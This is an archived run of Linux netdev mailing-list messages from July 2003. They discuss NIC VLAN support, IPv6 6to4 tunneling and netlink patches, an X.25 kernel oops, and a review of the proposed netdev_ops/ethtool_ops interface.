From andrius@andrius.org Fri Jul 11 07:59:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 07:59:47 -0700 (PDT) Received: from hl.kalnieciai.lt (postfix@hl.kauneta.net [212.47.103.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BExc2x020858 for ; Fri, 11 Jul 2003 07:59:39 -0700 Received: by hl.kalnieciai.lt (Postfix, from userid 1430) id 2FC1A4F187; Fri, 11 Jul 2003 17:59:36 +0300 (GMT-3) Received: from localhost (localhost [127.0.0.1]) by hl.kalnieciai.lt (Postfix) with ESMTP id 2B5714F177; Fri, 11 Jul 2003 17:59:36 +0300 (GMT-3) Date: Fri, 11 Jul 2003 17:59:36 +0300 (GMT-3) From: Andrius Kasparavicius X-X-Sender: andrius@hl.kauneta.net To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel?
In-Reply-To: <3F0C4DBD.8020007@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3960 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andrius@andrius.org Precedence: bulk X-list: netdev on vanilla linux kernel, eepro doesn't work, and with 1496 mtu, 8139too works with any mtu (and 1500). which is recommended to use, e100 or eepro100? Andrius. On Wed, 9 Jul 2003, Ben Greear wrote: > > is there any problems to include full vlans support? > > Intel's e100 driver (and all NICs supported by it) support vlans > fine, as do most of the GigE NICs. Tulip does not, last I hear, though > a work-around patch has been around forever. Realtek worked at one time, > not sure about now though... From mika.penttila@kolumbus.fi Fri Jul 11 08:10:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 08:10:10 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BFA12x024425 for ; Fri, 11 Jul 2003 08:10:02 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071118111831:20375 ; Fri, 11 Jul 2003 18:11:18 +0300 Message-ID: <3F0ED4B9.9000105@kolumbus.fi> Date: Fri, 11 Jul 2003 18:16:09 +0300 From: =?ISO-8859-15?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Mika Liljeberg CC: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> <1057930712.895.32.camel@hades> <3F0EC96D.6080102@kolumbus.fi> <1057933954.695.6.camel@hades> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 
|June 18, 2001) at 11.07.2003 18:11:18, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 18:10:49, Serialize complete at 11.07.2003 18:10:49 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=ISO-8859-15; format=flowed X-archive-position: 3961 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev Mika Liljeberg wrote: >Nope, since the tunnel interface will have 2002::/16. It seems to work >with the attached patch (against 2.4.21-ac4). A small fix to sit was >required as well. Look: > > ok, forgot that...looks ok to me. --Mika >hades:~# ifconfig 6to4 >6to4 Link encap:IPv6-in-IPv4 > inet6 addr: ::213.243.180.94/128 Scope:Compat > inet6 addr: 2002:d5f3:b45e::1/16 Scope:Global > UP RUNNING NOARP MTU:1480 Metric:1 > RX packets:4 errors:0 dropped:0 overruns:0 frame:0 > TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:0 > RX bytes:416 (416.0 b) TX bytes:496 (496.0 b) > >hades:~# ip -6 route list >::/96 via :: dev 6to4 metric 256 mtu 1480 advmss 1420 >2002::/16 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 >fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 >fe80::/64 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 >ff00::/8 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 >ff00::/8 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 >default via 2002:c058:6301:: dev 6to4 metric 1024 mtu 1480 advmss 1420 >hades:~# ping6 -c4 -n www.ipv6.org >PING www.ipv6.org(2001:6b0:1:ea:a00:20ff:fe8f:708f) 56 data bytes >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=1 ttl=250 time=207 ms >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=2 ttl=250 time=206 ms >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3 ttl=250 time=177 ms >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=4 ttl=250 time=78.5 
ms > >--- www.ipv6.org ping statistics --- >4 packets transmitted, 4 received, 0% packet loss, time 3030ms >rtt min/avg/max/mdev = 78.547/167.637/207.698/52.821 ms > >Anyone see any problems with this? > > MikaL > > > >------------------------------------------------------------------------ > >--- route.c.org 2003-07-11 16:41:55.000000000 +0300 >+++ route.c 2003-07-11 16:42:16.000000000 +0300 >@@ -743,7 +743,7 @@ > some exceptions. --ANK > */ > err = -EINVAL; >- if (!(gwa_type&IPV6_ADDR_UNICAST)) >+ if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST))) > goto out; > > grt = rt6_lookup(gw_addr, NULL, rtmsg->rtmsg_ifindex, 1); >--- sit.c.org 2003-07-11 16:57:53.000000000 +0300 >+++ sit.c 2003-07-11 17:17:42.000000000 +0300 >@@ -495,10 +495,13 @@ > addr_type = ipv6_addr_type(addr6); > } > >- if ((addr_type & IPV6_ADDR_COMPATv4) == 0) >- goto tx_error_icmp; >+ if ((addr_type & IPV6_ADDR_COMPATv4)) >+ dst = addr6->s6_addr32[3]; >+ else >+ dst = try_6to4(addr6); > >- dst = addr6->s6_addr32[3]; >+ if (!dst) >+ goto tx_error_icmp; > } > > if (ip_route_output(&rt, dst, tiph->saddr, RT_TOS(tos), tunnel->parms.link)) { > > From jmorris@intercode.com.au Fri Jul 11 08:38:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 08:38:16 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:onnveqSIFTPV362efaWpMjYLL15FJ09i@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BFc02x025149 for ; Fri, 11 Jul 2003 08:38:02 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6BFbir06371; Sat, 12 Jul 2003 01:37:45 +1000 Date: Sat, 12 Jul 2003 01:37:44 +1000 (EST) From: James Morris To: Jim Keniston cc: LKML , , Andrew Morton , "David S. 
Miller" , Jeff Garzik , Alan Cox , Randy Dunlap , Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting In-Reply-To: <3F0DB9A5.23723BE1@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3962 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 10 Jul 2003, Jim Keniston wrote: > James Morris wrote: > > > > On Tue, 8 Jul 2003, Jim Keniston wrote: > > > > + kerror_nl = netlink_kernel_create(NETLINK_KERROR, kerror_netlink_rcv); > > + if (kerror_nl == NULL) > > + panic("kerror_init: cannot initialize kerror_nl\n"); > > > > You can simply use NULL instead of passing the dummy kerror_netlink_rcv > > function. > > That begs the question: do we trust that nobody but the kernel will send > packets to a NETLINK_KERROR socket? Ordinary users can't, but any root > application can. Without kerror_netlink_rcv(), such packets don't get > dequeued. Indeed, the kernel socket buffer fills up. I think this needs to be addressed in the netlink code, per the patch below. Comments? 
- James
-- 
James Morris

diff -NurX dontdiff linux-2.5.75.orig/net/netlink/af_netlink.c linux-2.5.75.w1/net/netlink/af_netlink.c
--- linux-2.5.75.orig/net/netlink/af_netlink.c	2003-06-26 12:43:45.000000000 +1000
+++ linux-2.5.75.w1/net/netlink/af_netlink.c	2003-07-12 01:23:49.708254261 +1000
@@ -430,6 +430,10 @@
 		goto no_dst;
 	nlk = nlk_sk(sk);
 
+	/* Don't bother queuing skb if kernel socket has no input function */
+	if (nlk->pid == 0 && !nlk->data_ready)
+		goto no_dst;
+
 #ifdef NL_EMULATE_DEV
 	if (nlk->handler) {
 		skb_orphan(skb);

From greearb@candelatech.com Fri Jul 11 10:12:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:12:21 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHCD2x027935 for ; Fri, 11 Jul 2003 10:12:14 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BHBvKk013306; Fri, 11 Jul 2003 10:11:59 -0700 Message-ID: <3F0EEFDD.8050300@candelatech.com> Date: Fri, 11 Jul 2003 10:11:57 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Andrius Kasparavicius CC: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3963 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev

Andrius Kasparavicius wrote:
> on vanilla linux kernel, eepro doesn't work, and with 1496 mtu, 8139too
> works with any mtu (and 1500).
>
> which is recommended to use, e100 or eepro100?

As I mentioned, the e100 (intel's driver) is the one I recommend.
eepro100 does not seem to be updated in the kernel anymore, though if you go figure out how to install Becker's drivers, he may have it working with vlans by now. Ben > > Andrius. > > On Wed, 9 Jul 2003, Ben Greear wrote: > > >>>is there any problems to include full vlans support? >> >>Intel's e100 driver (and all NICs supported by it) support vlans >>fine, as do most of the GigE NICs. Tulip does not, last I hear, though >>a work-around patch has been around forever. Realtek worked at one time, >>not sure about now though... > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From garzik@gtf.org Fri Jul 11 10:19:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:19:12 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHJ42x028276 for ; Fri, 11 Jul 2003 10:19:07 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id DB0556680; Fri, 11 Jul 2003 13:18:58 -0400 (EDT) Date: Fri, 11 Jul 2003 13:18:58 -0400 From: Jeff Garzik To: Ben Greear Cc: Andrius Kasparavicius , netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? Message-ID: <20030711171858.GI2210@gtf.org> References: <3F0EEFDD.8050300@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0EEFDD.8050300@candelatech.com> User-Agent: Mutt/1.3.28i X-archive-position: 3964 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 10:11:57AM -0700, Ben Greear wrote: > eepro100 does not seem to be updated in the kernel anymore, though if you > go figure > out how to install Becker's drivers, he may have it working with vlans > by now. 
I won't say for sure, but I'm fairly certain he does. Most of his drivers got a "slightly larger than normal MTU" pass-over a while ago. I objected to the eepro100 patch, because all it did was change one magic number to another, in the configuration data. I had absolutely no basis for evaluation other than "I hope it works", so it was rejected. If someone wants to look at his eepro100 and merge in new changes (vlan or otherwise), that'd be great. His tulip MTU (aka vlan) changes also want pulling into mainline kernel, since his changes are _much_ better than the tulip vlan patch floating around. Jeff From greearb@candelatech.com Fri Jul 11 10:26:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:26:11 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHQ52x028639 for ; Fri, 11 Jul 2003 10:26:06 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BHPvKk015102; Fri, 11 Jul 2003 10:25:57 -0700 Message-ID: <3F0EF325.9060708@candelatech.com> Date: Fri, 11 Jul 2003 10:25:57 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Andrius Kasparavicius , netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? 
References: <3F0EEFDD.8050300@candelatech.com> <20030711171858.GI2210@gtf.org> In-Reply-To: <20030711171858.GI2210@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3965 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > On Fri, Jul 11, 2003 at 10:11:57AM -0700, Ben Greear wrote: > >>eepro100 does not seem to be updated in the kernel anymore, though if you >>go figure >>out how to install Becker's drivers, he may have it working with vlans >>by now. > > > I won't say for sure, but I'm fairly certain he does. Most of his > drivers got a "slightly larger than normal MTU" pass-over a while ago. > > I objected to the eepro100 patch, because all it did was change one > magic number to another, in the configuration data. I had absolutely no > basis for evaluation other than "I hope it works", so it was rejected. > > If someone wants to look at his eepro100 and merge in new changes (vlan > or otherwise), that'd be great. His tulip MTU (aka vlan) changes also > want pulling into mainline kernel, since his changes are _much_ better > than the tulip vlan patch floating around. It is beyond me to do this merge at this time, but if someone else can do it that would be great. I can also do some testing of the tulip merge, at least..as I have loads of 4-port nics lying around. 
Ben > > Jeff > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From khc@pm.waw.pl Fri Jul 11 10:27:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:27:45 -0700 (PDT) Received: from hq.pm.waw.pl (hq.pm.waw.pl [195.116.170.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHRd2x028824 for ; Fri, 11 Jul 2003 10:27:41 -0700 Received: by hq.pm.waw.pl (Postfix, from userid 10) id C59BC322F; Fri, 11 Jul 2003 19:27:36 +0200 (CEST) Received: by defiant.pm.waw.pl (Postfix, from userid 500) id 918823C7BC; Fri, 11 Jul 2003 19:27:28 +0200 (CEST) To: netdev@oss.sgi.com Subject: 2.5.74 X.25+LAPB still kills the kernel From: Krzysztof Halasa Date: 11 Jul 2003 19:27:28 +0200 Message-ID: Lines: 52 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3966 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: khc@pm.waw.pl Precedence: bulk X-list: netdev Hi, No need to actually use X.25+LAPB, it's enough to just compile it in. Linux version 2.5.74 (gcc version 3.2.3 20030422 (Red Hat Linux 3.2.3-4)) You do not need Ethernet either, it will oops with just loopback as well. Serial console dump follows (details available on request in case someone need them). 
gw:/# ip link 1: lo: mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 gw:/# ifconfig lo Link eUnable to handle kernel paging requestncap:Local Loopb at virtual address 6b6b6b6b ack printing eip: inet addr:127.0c01a0f22 .0.1 Mask:255.0*pde = 00000000 .0.0 Oops: 0000 [#1] CPU: 0 EIP: 0060:[] Not tainted EFLAGS: 00010202 EIP is at __release_sock+0x22/0x60 eax: 6b6b6b6b ebx: 00000000 ecx: 00000000 edx: c3cd2c44 esi: c3cd2c44 edi: c3cd2c44 ebp: c10b7f00 esp: c10b7ef8 ds: 007b es: 007b ss: 0068 Process ifconfig (pid: 37, threadinfo=c10b6000 task=c10ce060) Stack: 00000000 c3cd2c88 c10b7f18 c01ee728 c3cd2c44 c3cd2c44 c3ed1d2c c3cdb494 c10b7f40 c01eebf8 c3cd2c44 c3cd2c44 00000000 00000000 00000000 c3cdb494 00000000 c3cdb4b8 c10b7f54 c019e1d6 c3cdb494 c3cdb4b8 c3ced41c c10b7f64 Call Trace: [] x25_destroy_socket+0x188/0x1a0 [] x25_release+0x38/0xa0 [] sock_release+0x56/0x80 [] sock_close+0x23/0x40 [] __fput+0xd6/0xe0 [] filp_close+0x3b/0x60 [] sys_close+0x47/0x60 [] syscall_call+0x7/0xb Code: 8b 18 c7 00 00 00 00 00 50 56 ff 96 1c 01 00 00 85 db 5a 89 UP LOOPBACK RUNN<0>Kernel panic: Fatal exception in interrupt ING MTU:16436 In interrupt handler - not syncing Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) -- Krzysztof Halasa Network Administrator From willy@www.linux.org.uk Fri Jul 11 11:19:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 11:19:54 -0700 (PDT) Received: from www.linux.org.uk (IDENT:XpQQKK9Omct24Pi0ZSXbJdJnepPwHcwq@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BIJl2x029840 for ; Fri, 11 Jul 2003 11:19:49 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b2Uk-0003Fl-Po for netdev@oss.sgi.com; Fri, 11 Jul 2003 19:19:46 +0100 Date: Fri, 11 Jul 2003 19:19:46 +0100 From: Matthew Wilcox To: netdev@oss.sgi.com 
Subject: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-archive-position: 3967 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c to net/ethernet/eth.c Index: drivers/net/net_init.c =================================================================== RCS file: /var/cvs/linux-2.5/drivers/net/net_init.c,v retrieving revision 1.4 diff -u -p -r1.4 net_init.c --- drivers/net/net_init.c 14 Jun 2003 22:15:21 -0000 1.4 +++ drivers/net/net_init.c 10 Jul 2003 20:57:55 -0000 @@ -222,23 +222,6 @@ struct net_device *alloc_etherdev(int si EXPORT_SYMBOL(init_etherdev); EXPORT_SYMBOL(alloc_etherdev); -static int eth_mac_addr(struct net_device *dev, void *p) -{ - struct sockaddr *addr=p; - if (netif_running(dev)) - return -EBUSY; - memcpy(dev->dev_addr, addr->sa_data,dev->addr_len); - return 0; -} - -static int eth_change_mtu(struct net_device *dev, int new_mtu) -{ - if ((new_mtu < 68) || (new_mtu > 1500)) - return -EINVAL; - dev->mtu = new_mtu; - return 0; -} - #ifdef CONFIG_FDDI /** Index: include/linux/etherdevice.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/etherdevice.h,v retrieving revision 1.3 diff -u -p -r1.3 etherdevice.h --- include/linux/etherdevice.h 14 Jun 2003 22:16:01 -0000 1.3 +++ include/linux/etherdevice.h 10 Jul 2003 21:00:23 -0000 @@ -38,6 +38,8 @@ extern int eth_header_cache(struct neig struct hh_cache *hh); extern int eth_header_parse(struct sk_buff *skb, unsigned char *haddr); +extern int eth_mac_addr(struct net_device *dev, void *p); +extern int eth_change_mtu(struct net_device *dev, int new_mtu); extern struct net_device 
*init_etherdev(struct net_device *dev, int sizeof_priv); extern struct net_device *alloc_etherdev(int sizeof_priv); static inline void eth_copy_and_sum (struct sk_buff *dest, unsigned char *src, int len, int base) Index: net/ethernet/eth.c =================================================================== RCS file: /var/cvs/linux-2.5/net/ethernet/eth.c,v retrieving revision 1.4 diff -u -p -r1.4 eth.c --- net/ethernet/eth.c 23 Jun 2003 03:30:58 -0000 1.4 +++ net/ethernet/eth.c 10 Jul 2003 20:58:54 -0000 @@ -241,3 +241,20 @@ void eth_header_cache_update(struct hh_c memcpy(((u8*)hh->hh_data) + HH_DATA_OFF(sizeof(struct ethhdr)), haddr, dev->addr_len); } + +int eth_mac_addr(struct net_device *dev, void *p) +{ + struct sockaddr *addr=p; + if (netif_running(dev)) + return -EBUSY; + memcpy(dev->dev_addr, addr->sa_data, dev->addr_len); + return 0; +} + +int eth_change_mtu(struct net_device *dev, int new_mtu) +{ + if ((new_mtu < 68) || (new_mtu > 1500)) + return -EINVAL; + dev->mtu = new_mtu; + return 0; +} -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" 
-- Robert Fisk From garzik@gtf.org Fri Jul 11 11:23:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 11:23:39 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BINZ2x030179 for ; Fri, 11 Jul 2003 11:23:36 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 2267C6687; Fri, 11 Jul 2003 14:23:30 -0400 (EDT) Date: Fri, 11 Jul 2003 14:23:30 -0400 From: Jeff Garzik To: Matthew Wilcox Cc: netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711182330.GC16037@gtf.org> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> User-Agent: Mutt/1.3.28i X-archive-position: 3968 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 07:19:46PM +0100, Matthew Wilcox wrote: > Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c > to net/ethernet/eth.c Why? It's not used outside of net_init.c AFAICS. And even so, don't you want to export those symbols? Jeff From garzik@gtf.org Fri Jul 11 12:32:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 12:32:31 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BJWL2x001899 for ; Fri, 11 Jul 2003 12:32:22 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 9B8A0665C; Fri, 11 Jul 2003 15:32:15 -0400 (EDT) Date: Fri, 11 Jul 2003 15:32:15 -0400 From: Jeff Garzik To: Matthew Wilcox Cc: netdev@oss.sgi.com, greearb@candelatech.com, "David S. 
Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030711193215.GH16037@gtf.org> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> User-Agent: Mutt/1.3.28i X-archive-position: 3969 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Comments: 1) The _ops are either too limited in scope, or too wide in scope. We have a bunch of function pointers in struct net_device. We are adding a bunch more func ptrs in a new struct foo_ops. If it is called ethtool_ops, I can support the addition of struct ethtool_ops *etops; to struct net_device. However, if we call it netdev_ops, the structure's name no longer describes its purpose. If we call it netdev_ops, we should move ALL the function pointers in struct net_device into netdev_ops as well, and deal with the associated driver breakage. So, either change the name back to ethtool_ops, or go all the way. The current name to me implies a job half-done. Personally, I would prefer the more radical "move all funcptrs into netdev_ops". This is closer to other Linux kernel APIs. 2) Yes, we do want a feature macro for this. David, I respectfully disagree with "no back compat" type arguments. Besides h/w vendors who want to support distros currently in the field (read: not the latest kernel), _I_ am personally impacted by API divergence. As I have said (and proven) many times, I personally spend time keeping the more popular ethernet drivers in sync, 2.4 <-> 2.5. 
Each time a 2.5-specific change is added that is not easily massaged by a
back compat macro, it costs me time. Hand-applying patches is not fun.

2.a) There is established precedent: grep for HAVE_xxx in netdevice.h
and look at the ton of hits you get.

2.b) If #1 is decided to be ethtool_ops, create HAVE_ETHTOOL_OPS macro

2.c) If #1 is decided to be netdev_ops, and all func ptrs are moved into
netdev_ops struct, then create the macro
	SET_NETDEV_OPS(dev, ops)
This allows full back compat, without ugliness in mainline tree.

3) The func ptrs _count() are totally bogus. We have an unconditional
indirect reference to a function call which does nothing but return a
driver constant.

I personally think that having ethtool_ops members manually calling
the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks.

3.a) Further, we will inevitably be adding more counts in the future.
If we wanted to be truly expandable, and you really don't like the
counts being in struct ethtool_gdrvinfo, then create a struct
ethtool_counts that puts all the constants in one place.

4) I don't see why ethtool.h suddenly needs to include linux/types.h,
when it hasn't needed it in all this time until now.

5) net/socket.c changes appear unrelated to this patch.

6) (low prio) Add documentation to
Documentation/networking/netdevices.txt. Most importantly, this
documents locking/context.

7) (low prio) All that similar code in net/core/ethtool.c can be
template-ized with a macro, IMO. Something like
	DEF_ETHTOOL_GOP(get_coalesce, ETHTOOL_GCOALESCE, ethtool_coalesce);
	DEF_ETHTOOL_SOP(set_coalesce, ethtool_coalesce);
(and templates for the ops that use edata)

8) (security) get-eeprom op needs to check that offset+len is not
invalid, and does not wrap.

9) phys_id op should return an error, for consistency if nothing else.
It's simple for driver authors to unconditionally return 0 if their code
has no failure cases, and it's a slow path so adding the return in the
driver code is no big deal.
10) (low prio) since it's a slow path, what about replacing the switch
statement in dev_ethtool() with a lookup table? All the ethtool
commands are low numbers. If you do this, I would suggest using the gcc
array initializer syntax:
	[ETHTOOL_GCOALESCE] = ethtool_get_coalesce,
All the ethtool ops have the same prototype, after all.

Comments?

From greearb@candelatech.com Fri Jul 11 12:51:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 12:51:50 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BJph2x017250 for ; Fri, 11 Jul 2003 12:51:44 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BJpOKk001019; Fri, 11 Jul 2003 12:51:25 -0700 Message-ID: <3F0F153C.4040506@candelatech.com> Date: Fri, 11 Jul 2003 12:51:24 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> In-Reply-To: <20030711193215.GH16037@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3970 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev

Jeff Garzik wrote:
> Comments:
>
